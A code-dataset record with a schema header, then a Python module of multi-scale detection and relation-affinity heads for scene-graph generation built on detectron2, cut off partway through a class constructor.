hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
56d40bef780542eb88743c09c1fa854747fa3696
| 37,011
|
py
|
Python
|
fcsgg/modeling/heads/multiscale_head.py
|
liuhengyue/fcsgg
|
826c6e194270461a66ca5d048cb67f1ccf7ef387
|
[
"MIT"
] | 9
|
2022-01-17T03:27:46.000Z
|
2022-03-26T09:35:59.000Z
|
fcsgg/modeling/heads/multiscale_head.py
|
liuhengyue/fcsgg
|
826c6e194270461a66ca5d048cb67f1ccf7ef387
|
[
"MIT"
] | 3
|
2022-01-26T03:28:18.000Z
|
2022-02-03T04:19:29.000Z
|
fcsgg/modeling/heads/multiscale_head.py
|
liuhengyue/fcsgg
|
826c6e194270461a66ca5d048cb67f1ccf7ef387
|
[
"MIT"
] | null | null | null |
"""
Core implementations of detection heads in multi-scale.
"""
__author__ = "Hengyue Liu"
__copyright__ = "Copyright (c) 2021 Futurewei Inc."
__credits__ = [""]
__license__ = "MIT License"
__version__ = "0.1"
__maintainer__ = "Hengyue Liu"
__email__ = "onehothenry@gmail.com"
import logging
import numpy as np
from collections import defaultdict
from typing import Dict, List, Optional, Tuple, Union
import torch
from torch import nn
import torch.nn.functional as F
from detectron2.config import configurable
from detectron2.layers import ShapeSpec
from detectron2.structures import Boxes, ImageList, Instances, pairwise_iou
from detectron2.utils.events import get_event_storage
from detectron2.utils.registry import Registry
from detectron2.layers import cat, Conv2d, get_norm, CNNBlockBase
import fvcore.nn.weight_init as weight_init
from fcsgg.structures import SceneGraph
import fcsgg.utils.centernet_utils as centernet_utils
from detectron2.modeling.backbone.resnet import DeformBottleneckBlock
from .heads import *
from fcsgg.layers import MultiscaleFusionLayer, NONLocalBlock2D, NONLocalBlock3D, MultiscaleSum
from fcsgg.modeling.losses import RAFLoss
HEADS_REGISTRY.__doc__ = """
Registry for a multiscale-head in a single-stage model.
The registered object will be called with `obj(cfg, input_shape)`.
The call is expected to return an :class:`Head`.
"""
logger = logging.getLogger(__name__)
def interpolate_sum(features: List[torch.Tensor]) -> torch.Tensor:
    """Upsample each coarser feature map to the finest resolution and sum.

    Args:
        features: tensors ordered fine-to-coarse, where ``features[i]`` has
            spatial size ``features[0]`` divided by ``2 ** i``.

    Returns:
        A new tensor with the shape of ``features[0]`` holding the sum of all
        (bilinearly upsampled) inputs.
    """
    # Clone so the in-place ``+=`` below cannot silently corrupt the caller's
    # ``features[0]`` (the original implementation aliased and mutated it).
    out_features = features[0].clone()
    for i in range(1, len(features)):
        out_features += F.interpolate(features[i], scale_factor=2 ** i, mode='bilinear', align_corners=True)
    return out_features
@HEADS_REGISTRY.register()
class MultiScaleHeads(CenternetRelationHeads):
    """Runs a ``CenternetRelationHeads`` independently on every input scale.

    Each loss key is suffixed with the name of the feature map it came from,
    so per-scale losses stay distinguishable after merging into one dict.
    """

    def __init__(self, cfg, input_shape):
        super().__init__(cfg, input_shape)
        # Ground-truth downsampling strides, e.g. [1, 2, 4, 8]; one per feature.
        assert len(cfg.MODEL.HEADS.OUTPUT_STRIDES) == len(self.in_features), "number of features and strides mismatch."
        self.strides = cfg.MODEL.HEADS.OUTPUT_STRIDES

    def _forward(
            self,
            features: torch.Tensor,
            targets: Optional[List[SceneGraph]] = None
    ) -> Tuple[Dict[str, torch.Tensor], Dict[str, torch.Tensor]]:
        """Delegate a single scale to the parent head."""
        return super().forward(features, targets)

    def forward(
            self,
            features: Dict[str, torch.Tensor],
            targets: Optional[List[SceneGraph]] = None
    ) -> Tuple[Dict[str, torch.Tensor], List[Dict[str, torch.Tensor]]]:
        losses: Dict[str, torch.Tensor] = {}
        preds: List[Dict[str, torch.Tensor]] = []
        for idx, feat_name in enumerate(self.in_features):
            # Per-scale ground truth only exists in training mode.
            scale_targets = None
            if self.training:
                scale_targets = [target[idx] for target in targets]
            scale_losses, scale_preds = self._forward(features[feat_name], scale_targets)
            suffix = "_" + str(feat_name)
            for key, value in scale_losses.items():
                losses[key + suffix] = value
            preds.append(scale_preds)
        return losses, preds
@HEADS_REGISTRY.register()
class MultiScaleSwitchNormHeads(SwitchNormHeads):
    """Applies a ``SwitchNormHeads`` at every scale, passing each scale's
    stride along so the parent can select the matching norm statistics.

    Loss keys are suffixed with ``"_s<stride>"``.
    """

    def __init__(self, cfg, input_shape):
        super().__init__(cfg, input_shape)
        # One ground-truth downsampling stride per input feature map.
        assert len(cfg.MODEL.HEADS.OUTPUT_STRIDES) == len(self.in_features), "number of features and strides mismatch."
        self.strides = cfg.MODEL.HEADS.OUTPUT_STRIDES

    def _forward(
            self,
            features: Tuple[torch.Tensor, torch.Tensor],
            targets: Optional[List[SceneGraph]] = None,
            stride: int = 0
    ) -> Tuple[Dict[str, torch.Tensor], Dict[str, torch.Tensor]]:
        """Delegate a single scale (with its stride) to the parent head."""
        return super().forward(features, targets, stride)

    def forward(
            self,
            features: Dict[str, torch.Tensor],
            targets: Optional[List[SceneGraph]] = None
    ) -> Tuple[Dict[str, torch.Tensor], List[Dict[str, torch.Tensor]]]:
        losses: Dict[str, torch.Tensor] = {}
        preds: List[Dict[str, torch.Tensor]] = []
        for idx, stride in enumerate(self.strides):
            feat = features[self.in_features[idx]]
            scale_targets = [target[idx] for target in targets] if self.training else None
            scale_losses, scale_preds = self._forward(feat, scale_targets, stride)
            suffix = "_s" + str(stride)
            losses.update({key + suffix: val for key, val in scale_losses.items()})
            preds.append(scale_preds)
        return losses, preds
@HEADS_REGISTRY.register()
class MultiScaleSwitchNormDAHeads(GeneralHeads):
    """Multi-scale object/relation heads with per-stride BN statistics and a
    dual-attention (DA) refinement of the relation affinity fields (RAFs).

    Object sub-heads (class heatmap ``cls``, box size ``wh``, center offset
    ``reg``) and the RAF sub-head are ``MultiBNSingleHead`` modules shared
    across scales.  Per-scale class heatmaps are aggregated by
    ``MultiscaleSum`` and fed to ``DA_Module`` to attend over the RAF
    predictions.
    """
    def __init__(self, cfg, input_shape):
        """Build the heads from the config.

        Args:
            cfg: detectron2-style config node; reads ``MODEL.HEADS.*``,
                ``MODEL.HEADS.RAF.*``, ``RELATION.*`` and
                ``MODEL.FPN.NUM_BRANCHES``.
            input_shape: shapes of the input feature maps (handled by the base).
        """
        super().__init__(cfg, input_shape)
        # This head only makes sense with multiple output scales.
        assert not self.single_scale
        self.strides = cfg.MODEL.HEADS.OUTPUT_STRIDES
        self.relation_on = cfg.RELATION.RELATION_ON
        self.use_gt_label = cfg.RELATION.USE_GT_OBJECT_LABEL
        self.use_non_local = cfg.MODEL.HEADS.RAF.NON_LOCAL
        self.num_predicates = cfg.MODEL.HEADS.NUM_PREDICATES
        self.raf_loss_weight = cfg.MODEL.HEADS.LOSS.RAF_WEIGHT
        self.raf_dilation = cfg.MODEL.HEADS.RAF.DILATION
        self.output_stride = self.output_strides[0]
        self.fpn_num_branches = cfg.MODEL.FPN.NUM_BRANCHES
        self.down_ratio = cfg.MODEL.HEADS.RAF.DOWN_SAMPLE_RATIO
        self.num_levels = len(self.output_strides)
        bn_momentum = cfg.MODEL.HEADS.BN_MOMENTUM
        # the strides to downsample the gt, [1, 2, 4, 8]
        assert len(cfg.MODEL.HEADS.OUTPUT_STRIDES) * self.fpn_num_branches == len(self.in_features), \
            "number of features and strides mismatch."
        deformable_on = cfg.MODEL.HEADS.RAF.LAST_DEFORM_ON
        num_groups = cfg.MODEL.HEADS.RAF.NUM_GROUPS
        width_per_group = cfg.MODEL.HEADS.RAF.WIDTH_PER_GROUP
        bottleneck_channels = num_groups * width_per_group
        conv_dim = cfg.MODEL.HEADS.CONV_DIM
        num_conv = cfg.MODEL.HEADS.NUM_CONV
        conv_norm = cfg.MODEL.HEADS.NORM
        conv_dims = [conv_dim] * num_conv
        raf_conv_dims = [cfg.MODEL.HEADS.RAF.CONV_DIM] * cfg.MODEL.HEADS.RAF.NUM_CONV
        kernel_size = cfg.MODEL.HEADS.RAF.KERNEL_SIZE
        in_channels = self.in_channels[0]
        # Class-heatmap head; sigmoid_ is applied in-place as its activation.
        self.cls_head = MultiBNSingleHead(
            in_channels,
            self.num_classes,
            self.output_stride,
            conv_dims,
            conv_norm=conv_norm,
            bias_fill=True,
            bias_value=self.cls_bias_value,
            activation=torch.sigmoid_,
            output_strides=self.output_strides,
            bn_momentum=bn_momentum
        )
        # Box width/height regression head (2 channels, raw output).
        self.wh_head = MultiBNSingleHead(in_channels, 2, self.output_stride,
                                         conv_dims,
                                         bias_fill=True,
                                         conv_norm=conv_norm,
                                         activation=None,
                                         output_strides=self.output_strides,
                                         bn_momentum=bn_momentum)
        # Center-offset regression head (2 channels, raw output).
        self.reg_head = MultiBNSingleHead(in_channels, 2, self.output_stride,
                                          conv_dims,
                                          conv_norm=conv_norm,
                                          activation=None,
                                          output_strides=self.output_strides,
                                          bn_momentum=bn_momentum)
        if self.relation_on:
            # RAF head: 2 channels (a 2-vector field) per predicate class.
            self.raf_head = MultiBNSingleHead(in_channels,
                                              2 * self.num_predicates,
                                              self.output_stride,
                                              raf_conv_dims,
                                              kernel_size=kernel_size,
                                              conv_norm=conv_norm,
                                              bias_fill=True,
                                              deformable_on=deformable_on,
                                              dilation=self.raf_dilation,
                                              bottleneck_channels=bottleneck_channels,
                                              activation=None,
                                              output_strides=self.output_strides,
                                              down_ratio=self.down_ratio,
                                              bn_momentum=bn_momentum
                                              )
            # Dual-attention module modulating RAFs with object heatmaps.
            self.attn_layer = DA_Module(self.num_classes, self.num_predicates, down_ratio=self.down_ratio)
            # Aggregates the per-scale class heatmaps for the attention module.
            self.aggr_layer = MultiscaleSum(len(self.output_strides))
        if self.training:
            # Loss evaluator is only needed during training.
            self.raf_loss_evaluator = RAFLoss(cfg)
    def _forward_raf_branch(
            self,
            features: torch.Tensor,
            obj_features: torch.Tensor,
            targets: Optional[List[SceneGraph]] = None,
            stride: int = 0
    ) -> Tuple[Dict[str, torch.Tensor], Dict[str, torch.Tensor]]:
        """Predict relation affinity fields for one scale.

        Args:
            features: relation-branch feature map for this scale.
            obj_features: aggregated object heatmap features consumed by the
                attention module.
            targets: ground truth for this scale; required in training mode.
            stride: output stride of this scale (selects BN statistics).

        Returns:
            ``(losses, preds)`` with ``preds = {'raf': ...}``; ``losses``
            contains ``'loss_raf'`` only in training mode.
        """
        losses = {}
        if self.training:
            assert targets
        rafs = self.raf_head(features, stride)
        # Refine RAFs with dual attention conditioned on object features.
        rafs = self.attn_layer(obj_features, rafs)
        preds = {'raf': rafs}
        if self.training:
            loss_raf = self.raf_loss_evaluator(rafs, targets)
            loss_raf *= self.raf_loss_weight
            losses = {'loss_raf': loss_raf}
        return losses, preds
    def _forward_object_branch(
            self,
            features: torch.Tensor,
            targets: Optional[List[SceneGraph]] = None,
            stride: int = 0
    ) -> Tuple[Dict[str, torch.Tensor], Dict[str, torch.Tensor]]:
        """Predict class heatmaps and box regressions for one scale.

        Args:
            features: center branch features from backbone (w/fpn).
            targets: ground truth for this scale; required in training mode.
            stride: output stride of this scale (selects BN statistics).

        Returns:
            ``(losses, preds)`` with ``preds`` holding 'cls', 'wh', 'reg'.
        """
        losses = {}
        if self.training:
            assert targets
        cls = self.cls_head(features, stride)
        wh = self.wh_head(features, stride)
        reg = self.reg_head(features, stride)
        preds = {
            'cls': cls,
            'wh': wh,
            'reg': reg
        }
        if self.training:
            # cls_head already applied sigmoid, hence after_activation=True.
            losses.update(self.loss(preds, targets, after_activation=True))
        return losses, preds
    def forward(
            self,
            features: Dict[str, torch.Tensor],
            targets: Optional[List[SceneGraph]] = None
    ) -> Tuple[Dict[str, torch.Tensor], List[Dict[str, torch.Tensor]]]:
        """Run object heads on every scale, then (if enabled) the RAF heads.

        Loss keys are suffixed with ``"_s<stride>"``; one prediction dict is
        returned per scale, with RAF outputs merged in when relation_on.
        """
        features = [features[f] for f in self.in_features]
        preds, losses = [], {}
        if self.fpn_num_branches == 2:
            # right now only support 2 branches
            object_branch_features = features[:self.num_levels]
            relation_branch_features = features[self.num_levels:]
        else:
            # Single branch: both head groups share the same features.
            object_branch_features = features
            relation_branch_features = features
        center_preds = []
        targets_all_scales = [[target[i] for target in targets] for i in range(len(self.output_strides))] \
            if self.training else [None for _ in range(len(self.output_strides))]
        # forward object branch first
        for i, features_per_scale in enumerate(object_branch_features):
            # form a SceneGraph
            targets_per_scale = targets_all_scales[i]
            cur_stride = "_s" + str(self.strides[i])
            loss, pred = self._forward_object_branch(features_per_scale, targets_per_scale, self.strides[i])
            loss = {k + cur_stride: v for k, v in loss.items()}
            # if self.training or self.use_gt_label:
            #     ct_maps_per_scale = torch.stack([target.gt_ct_maps[i] for target in targets], dim=0)
            # else:
            #     # pred['cls'] = torch.sigmoid(pred['cls'])
            #     ct_maps_per_scale = pred['cls'].detach()
            # Detach so the relation branch does not backprop into the
            # object-branch heatmaps.
            ct_maps_per_scale = pred['cls'].detach()
            losses.update(loss)
            center_preds.append(ct_maps_per_scale)
            preds.append(pred)
        if self.relation_on:
            center_features = self.aggr_layer(center_preds)
            # then forward raf branch
            for i, features_per_scale in enumerate(relation_branch_features):
                # add non local block
                # nonlocal_feat = self.non_local_attn(fused_center_feats[i])
                # cat_feat = torch.cat((features_per_scale, nonlocal_feat), dim=1)
                # if self.use_non_local:
                #     features_per_scale = self.non_local_attn(fused_center_feats[i], features_per_scale)
                # else:
                # simple concat
                # features_per_scale = torch.cat((features_per_scale, center_preds[i]), dim=1)
                targets_per_scale = targets_all_scales[i]
                cur_stride = "_s" + str(self.strides[i])
                loss, pred = self._forward_raf_branch(features_per_scale,
                                                      center_features[i],
                                                      targets_per_scale,
                                                      self.strides[i])
                loss = {k + cur_stride: v for k, v in loss.items()}
                losses.update(loss)
                # Merge RAF predictions into this scale's prediction dict.
                preds[i].update(pred)
        return losses, preds
@HEADS_REGISTRY.register()
class MultiScaleSwitchNormConcatClassHeads(GeneralHeads):
    """Multi-scale heads whose relation branch consumes backbone features
    concatenated with aggregated object-branch features.

    The class head additionally returns its penultimate feature map
    (``output_feat=True``); those per-scale feature maps are summed across
    scales by ``MultiscaleSum`` and concatenated channel-wise onto the
    relation-branch input before the RAF head runs.
    """
    def __init__(self, cfg, input_shape):
        """Build the heads from the config.

        Args:
            cfg: detectron2-style config node; reads ``MODEL.HEADS.*``,
                ``MODEL.HEADS.RAF.*``, ``RELATION.*`` and
                ``MODEL.FPN.NUM_BRANCHES``.
            input_shape: shapes of the input feature maps (handled by the base).
        """
        super().__init__(cfg, input_shape)
        # This head only makes sense with multiple output scales.
        assert not self.single_scale
        self.strides = cfg.MODEL.HEADS.OUTPUT_STRIDES
        self.relation_on = cfg.RELATION.RELATION_ON
        self.use_gt_label = cfg.RELATION.USE_GT_OBJECT_LABEL
        self.use_non_local = cfg.MODEL.HEADS.RAF.NON_LOCAL
        self.num_predicates = cfg.MODEL.HEADS.NUM_PREDICATES
        self.raf_loss_weight = cfg.MODEL.HEADS.LOSS.RAF_WEIGHT
        self.raf_dilation = cfg.MODEL.HEADS.RAF.DILATION
        self.output_stride = self.output_strides[0]
        self.fpn_num_branches = cfg.MODEL.FPN.NUM_BRANCHES
        self.down_ratio = cfg.MODEL.HEADS.RAF.DOWN_SAMPLE_RATIO
        split_pred = cfg.MODEL.HEADS.RAF.SPLIT
        bn_momentum = cfg.MODEL.HEADS.BN_MOMENTUM
        # the strides to downsample the gt, [1, 2, 4, 8]
        assert len(cfg.MODEL.HEADS.OUTPUT_STRIDES) * self.fpn_num_branches == len(self.in_features), \
            "number of features and strides mismatch."
        deformable_on = cfg.MODEL.HEADS.RAF.LAST_DEFORM_ON
        num_groups = cfg.MODEL.HEADS.RAF.NUM_GROUPS
        width_per_group = cfg.MODEL.HEADS.RAF.WIDTH_PER_GROUP
        bottleneck_channels = num_groups * width_per_group
        conv_dim = cfg.MODEL.HEADS.CONV_DIM
        num_conv = cfg.MODEL.HEADS.NUM_CONV
        conv_norm = cfg.MODEL.HEADS.NORM
        conv_dims = [conv_dim] * num_conv
        raf_conv_dims = [cfg.MODEL.HEADS.RAF.CONV_DIM] * cfg.MODEL.HEADS.RAF.NUM_CONV
        kernel_size = cfg.MODEL.HEADS.RAF.KERNEL_SIZE
        in_channels = self.in_channels[0]
        # Class-heatmap head; also emits its last hidden feature map
        # (output_feat=True) for reuse by the relation branch.
        self.cls_head = MultiBNSingleHead(
            in_channels,
            self.num_classes,
            self.output_stride,
            conv_dims,
            conv_norm=conv_norm,
            bias_fill=True,
            bias_value=self.cls_bias_value,
            activation=torch.sigmoid_,
            output_strides=self.output_strides,
            bn_momentum=bn_momentum,
            output_feat=True
        )
        # Box width/height regression head (2 channels, raw output).
        self.wh_head = MultiBNSingleHead(in_channels, 2, self.output_stride,
                                         conv_dims,
                                         bias_fill=True,
                                         conv_norm=conv_norm,
                                         activation=None,
                                         output_strides=self.output_strides,
                                         bn_momentum=bn_momentum)
        # Center-offset regression head (2 channels, raw output).
        self.reg_head = MultiBNSingleHead(in_channels, 2, self.output_stride,
                                          conv_dims,
                                          conv_norm=conv_norm,
                                          activation=None,
                                          output_strides=self.output_strides,
                                          bn_momentum=bn_momentum)
        if self.relation_on:
            # RAF head input is the backbone features concatenated with the
            # class head's hidden features, hence the extra conv_dims[-1]
            # input channels.  tanh_ bounds the affinity field to [-1, 1].
            self.raf_head = MultiBNSingleHead(in_channels + conv_dims[-1],
                                              2 * self.num_predicates,
                                              self.output_stride,
                                              raf_conv_dims,
                                              kernel_size=kernel_size,
                                              conv_norm=conv_norm,
                                              bias_fill=True,
                                              deformable_on=deformable_on,
                                              dilation=self.raf_dilation,
                                              bottleneck_channels=bottleneck_channels,
                                              activation=torch.tanh_,
                                              output_strides=self.output_strides,
                                              down_ratio=self.down_ratio,
                                              up_ratio=1,
                                              split_pred=split_pred
                                              )
            # Sums per-scale object features for the relation branch.
            self.aggr_layer = MultiscaleSum(len(self.output_strides), aggr_method="sum")
        if self.training:
            # Loss evaluator is only needed during training.
            self.raf_loss_evaluator = RAFLoss(cfg)
    def _forward_raf_branch(
            self,
            features: torch.Tensor,
            targets: Optional[List[SceneGraph]] = None,
            stride: int = 0
    ) -> Tuple[Dict[str, torch.Tensor], Dict[str, torch.Tensor]]:
        """Predict relation affinity fields for one scale.

        Args:
            features: relation-branch features already concatenated with the
                aggregated object features (done by ``forward``).
            targets: ground truth for this scale; required in training mode.
            stride: output stride of this scale (selects BN statistics).

        Returns:
            ``(losses, preds)`` with ``preds = {'raf': ...}``; ``losses``
            contains ``'loss_raf'`` only in training mode.
        """
        losses = {}
        if self.training:
            assert targets
        rafs = self.raf_head(features, stride)
        preds = {'raf': rafs}
        if self.training:
            loss_raf = self.raf_loss_evaluator(rafs, targets)
            loss_raf *= self.raf_loss_weight
            losses = {'loss_raf': loss_raf}
        return losses, preds
    def _forward_object_branch(
            self,
            features: torch.Tensor,
            targets: Optional[List[SceneGraph]] = None,
            stride: int = 0
    ) -> Tuple[Dict[str, torch.Tensor], Dict[str, torch.Tensor]]:
        """Predict class heatmaps and box regressions for one scale.

        Args:
            features: center branch features from backbone (w/fpn).
            targets: ground truth for this scale; required in training mode.
            stride: output stride of this scale (selects BN statistics).

        Returns:
            ``(losses, preds)``; ``preds`` holds 'cls', 'wh', 'reg' plus
            'obj_feat', the class head's hidden feature map.
        """
        losses = {}
        if self.training:
            assert targets
        cls, obj_feat = self.cls_head(features, stride)
        wh = self.wh_head(features, stride)
        reg = self.reg_head(features, stride)
        preds = {
            'cls': cls,
            'wh': wh,
            'reg': reg,
            'obj_feat': obj_feat
        }
        if self.training:
            # cls_head already applied sigmoid, hence after_activation=True.
            losses.update(self.loss(preds, targets, after_activation=True))
        return losses, preds
    def forward(
            self,
            features: Dict[str, torch.Tensor],
            targets: Optional[List[SceneGraph]] = None
    ) -> Tuple[Dict[str, torch.Tensor], List[Dict[str, torch.Tensor]]]:
        """Run object heads per scale first, then RAF heads on the
        concatenation of relation features and aggregated object features.

        Loss keys are suffixed with ``"_s<stride>"``.
        """
        features = [features[f] for f in self.in_features]
        preds, losses = [], {}
        if self.fpn_num_branches == 2:
            # right now only support 2 branches
            object_branch_features = features[:len(self.output_strides)]
            relation_branch_features = features[len(self.output_strides):]
        else:
            # Single branch: both head groups share the same features.
            object_branch_features = features
            relation_branch_features = features
        center_preds = []
        targets_all_scales = [[target[i] for target in targets] for i in range(len(self.output_strides))] \
            if self.training else [None for _ in range(len(self.output_strides))]
        # forward object branch first
        for i, features_per_scale in enumerate(object_branch_features):
            # form a SceneGraph
            targets_per_scale = targets_all_scales[i]
            cur_stride = "_s" + str(self.strides[i])
            loss, pred = self._forward_object_branch(features_per_scale, targets_per_scale, self.strides[i])
            loss = {k + cur_stride: v for k, v in loss.items()}
            # if self.training or self.use_gt_label:
            #     ct_maps_per_scale = torch.stack([target.gt_ct_maps[i] for target in targets], dim=0)
            # else:
            # Clone + detach so the relation branch cannot backprop into (or
            # mutate) the object-branch features.
            ct_maps_per_scale = pred['obj_feat'].clone().detach()
            losses.update(loss)
            center_preds.append(ct_maps_per_scale)
            preds.append(pred)
        if self.relation_on:
            center_features = self.aggr_layer(center_preds)
            # then forward raf branch
            for i, features_per_scale in enumerate(relation_branch_features):
                # Channel-wise concat of relation features with aggregated
                # object features at this scale.
                features_per_scale = torch.cat((features_per_scale, center_features[i]), dim=1)
                targets_per_scale = targets_all_scales[i]
                cur_stride = "_s" + str(self.strides[i])
                loss, pred = self._forward_raf_branch(features_per_scale, targets_per_scale, self.strides[i])
                loss = {k + cur_stride: v for k, v in loss.items()}
                losses.update(loss)
                # Merge RAF predictions into this scale's prediction dict.
                preds[i].update(pred)
        return losses, preds
@HEADS_REGISTRY.register()
class MultiScaleSwitchNormDualHeads(DualBranchSwitchNormHeads):
    """Dual-branch switch-norm heads applied per scale.

    The flattened input feature list holds two branches back to back: the
    first half feeds the object branch, the second half the relation branch,
    and feature ``i`` of each half shares stride ``strides[i]``.
    """

    def __init__(self, cfg, input_shape):
        super().__init__(cfg, input_shape)
        self.strides = cfg.MODEL.HEADS.OUTPUT_STRIDES
        self.num_features_per_branch = len(self.strides)
        # Ground-truth downsampling strides, e.g. [4, 8, ...]; two branches
        # worth of features are expected.
        assert self.num_features_per_branch * 2 == len(self.in_features), "number of features and strides mismatch."

    def _forward(
            self,
            features: Tuple[torch.Tensor, torch.Tensor],
            targets: Optional[List[SceneGraph]] = None,
            stride: int = 0
    ) -> Tuple[Dict[str, torch.Tensor], Dict[str, torch.Tensor]]:
        """Delegate one (object, relation) feature pair to the parent head."""
        return super().forward(features, targets, stride)

    def forward(
            self,
            features: Dict[str, torch.Tensor],
            targets: Optional[List[SceneGraph]] = None
    ) -> Tuple[Dict[str, torch.Tensor], List[Dict[str, torch.Tensor]]]:
        feats = [features[name] for name in self.in_features]
        half = self.num_features_per_branch
        losses: Dict[str, torch.Tensor] = {}
        preds: List[Dict[str, torch.Tensor]] = []
        for idx in range(half):
            # Pair the object-branch and relation-branch features of scale idx.
            pair = (feats[idx], feats[idx + half])
            scale_targets = [target[idx] for target in targets] if self.training else None
            stride = self.strides[idx]
            scale_losses, scale_preds = self._forward(pair, scale_targets, stride)
            suffix = "_s" + str(stride)
            for key, val in scale_losses.items():
                losses[key + suffix] = val
            preds.append(scale_preds)
        return losses, preds
@HEADS_REGISTRY.register()
class MultiScaleSwitchNormAttnHeads(GeneralHeads):
    """Multi-scale heads where the relation branch attends over fused
    multi-scale class heatmaps.

    Raw (pre-sigmoid) class heatmaps from every scale are fused by a
    ``MultiscaleFusionLayer`` and concatenated channel-wise onto the
    relation-branch features before the RAF head runs.
    """
    def __init__(self, cfg, input_shape):
        """Build the heads from the config.

        Args:
            cfg: detectron2-style config node; reads ``MODEL.HEADS.*``,
                ``MODEL.HEADS.RAF.*``, ``RELATION.*`` and
                ``MODEL.FPN.NUM_BRANCHES``.
            input_shape: shapes of the input feature maps (handled by the base).
        """
        super().__init__(cfg, input_shape)
        # This head only makes sense with multiple output scales.
        assert not self.single_scale
        self.strides = cfg.MODEL.HEADS.OUTPUT_STRIDES
        self.relation_on = cfg.RELATION.RELATION_ON
        self.use_gt_label = cfg.RELATION.USE_GT_OBJECT_LABEL
        self.use_non_local = cfg.MODEL.HEADS.RAF.NON_LOCAL
        self.num_predicates = cfg.MODEL.HEADS.NUM_PREDICATES
        self.raf_loss_weight = cfg.MODEL.HEADS.LOSS.RAF_WEIGHT
        self.raf_dilation = cfg.MODEL.HEADS.RAF.DILATION
        self.output_stride = self.output_strides[0]
        self.fpn_num_branches = cfg.MODEL.FPN.NUM_BRANCHES
        self.down_ratio = cfg.MODEL.HEADS.RAF.DOWN_SAMPLE_RATIO
        bn_momentum = cfg.MODEL.HEADS.BN_MOMENTUM
        # the strides to downsample the gt, [1, 2, 4, 8]
